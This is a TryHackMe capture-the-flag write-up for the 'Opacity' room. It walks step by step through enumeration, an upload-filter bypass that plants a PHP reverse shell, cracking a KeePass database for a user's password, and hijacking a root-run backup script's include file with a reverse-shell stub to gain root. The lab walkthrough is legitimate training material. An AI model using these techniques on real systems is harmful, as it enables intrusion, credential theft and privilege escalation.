Writeup for the room Opacity from TryHackMe

Tags: Writeups TryHackMe Boot2Root Web Network

Machine Information

Initial Enumeration

as always starting with an nmap scan to map the network services running on the machine:

└─$ nmap -p- -sV -T4 --min-rate=10000 opacity.thm | tee nmap.log
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-16 18:15 EDT
Warning: opacity.thm giving up on port because retransmission cap hit (6).
Nmap scan report for opacity.thm (opacity.thm)
Host is up (0.14s latency).
Not shown: 62210 closed tcp ports (conn-refused), 3321 filtered tcp ports (no-response)
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.03 seconds

HTTP (80)

at first glance going to the website gives us a login form, tried couple of authentication bypass, sqli techniques but the login ended up being secure?


Directory Enumeration:

└─$ gobuster dir -u http://opacity.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt| tee dirs.log
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://opacity.thm/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
2023/05/13 19:01:26 Starting gobuster in directory enumeration mode
/css                  (Status: 301) [Size: 308] [--> http://opacity.thm/css/]
/cloud                (Status: 301) [Size: 310] [--> http://opacity.thm/cloud/]

the /cloud directory seems to be a Personal Cloud Storage that stores “images” for 5 minutes
so we can fool it and establish initial foothold by uploading a reverse shell
the upload feature needs an external url to download from, so we need to host
our http server.

Samba (139/445)

SMB Enumeration:

└─$ enum4linux opacity.thm


[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\sysadmin (Local User)

local user: sysadmin

Initial Foothold

to establish foothold we have to upload our reverse shell script to the server via the /cloud service
at first i thought it would have some filters but there were none it only need the exstention to exist in
the input field.

Hosting our reverse shell: pentestmonkey reverse-shell

└─$ python3 -m http.server
Serving HTTP on port 8000 ( ...

Listening for connections:

└─$ nc -lvnp 4444
listening on [any] 4444 ...

after trying to upload my shell as [shell.php.png, shell.php]
adding a [space] .png after the php file extention seems to work !


now that we were able to upload our reverse shell, we get redirected to /cloud/storage.php,
and our shell script is stored at http://opacity.thm/cloud/images/shell.php .png removing the .png
will trigger our shell script and give us shell access to the machine!


Getting Stable Shell:

www-data@opacity:/$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@opacity:/$ export TERM=xterm

but we are still www-data we don’t even have a user.

Privilege Escalation

before uploading any script that help with priv esc like linPEAS i usually check for interesting script & files
in directories like /tmp, /opt and ofcourse the local user’s directory: /home/sysadmin

in the /opt directory there is a KeePassXC Database, KeePassXC is an offline open-source password manager,
nice find because we can try and crack the master password!

www-data@opacity:/$ ls /opt

www-data to sysadmin

Hosting an http server in our target’s machine:

www-data@opacity:/opt$ python3 -m http.server
Serving HTTP on port 8000 ( ...

Downloading the KeePassXC database file to our machine:

└─$ wget http://opacity.thm:8000/dataset.kdbx

Getting the keepass hash using the keepass2john script:

└─$ keepass2john dataset.kdbx > keepass_hash

Cracking the hash using John The Ripper:

└─$ john keepass_hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 100000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963        (dataset)     
1g 0:00:00:11 DONE (2023-05-16 19:36) 0.08826g/s 77.31p/s 77.31c/s 77.31C/s chichi..melvin
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Opening the database file in KeePassXC using the password 741852963:

└─$ keepassxc dataset.kdbx 

keepass-login keepass-sysadmin-password

Creds: sysadmin : Cl0udP4ss40p4city#8700

Login as sysadmin:

www-data@opacity:/$ su sysadmin
Password: Cl0udP4ss40p4city#8700


sysadmin@opacity:~$ cat local.txt

now that we are logged in as sysadmin we can look for a way to get root on the machine,
but before we do that logging in via ssh is a good idea.

sysadmin to root

in the /home/sysadmin/ we can see a directory called scripts and inside the directory
we can see there is a php script that uses a bunch of libraries inside lib/.



//Backup of scripts sysadmin folder
zipData('/home/sysadmin/scripts', '/var/backups/backup.zip');
echo 'Successful', PHP_EOL;

//Files scheduled removal
$dir = "/var/www/html/cloud/images";
    $di = new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS);
    $ri = new RecursiveIteratorIterator($di, RecursiveIteratorIterator::CHILD_FIRST);
    foreach ( $ri as $file ) {
        $file->isDir() ?  rmdir($file) : unlink($file);

and the funny thing is we own the lib directory so we can move/copy files

sysadmin@opacity:~/scripts$ ls -ld lib/
drwxr-xr-x 2 sysadmin root 4096 Jul 26  2022 lib/

because of the script using lib/backup.inc.php we can move the file to home/sysadmin
and create a file with the same name and sneak in a reverse shell script so everytime the script
runs it triggers our reverse shell.

sysadmin@opacity:~/scripts/lib$ mv backup.inc.php ../..

now we create the file so we are the owners and we can write into it

sysadmin@opacity:~/scripts/lib$ touch backup.inc.php
sysadmin@opacity:~/scripts/lib$ ls -ld backup.inc.php 
-rw-rw-r-- 1 sysadmin sysadmin 0 May 17 07:54 backup.inc.php

sysadmin@opacity:~/scripts/lib$ cat backup.inc.php 

exec("sh <&3 >&3 2>&3");


now wait for the script to run, and we have root !

└─$ nc -lvnp 9000
listening on [any] 9000 ...
connect to [] from (UNKNOWN) [opacity.thm] 50722
uid=0(root) gid=0(root) groups=0(root)

Thank You For Reading ❤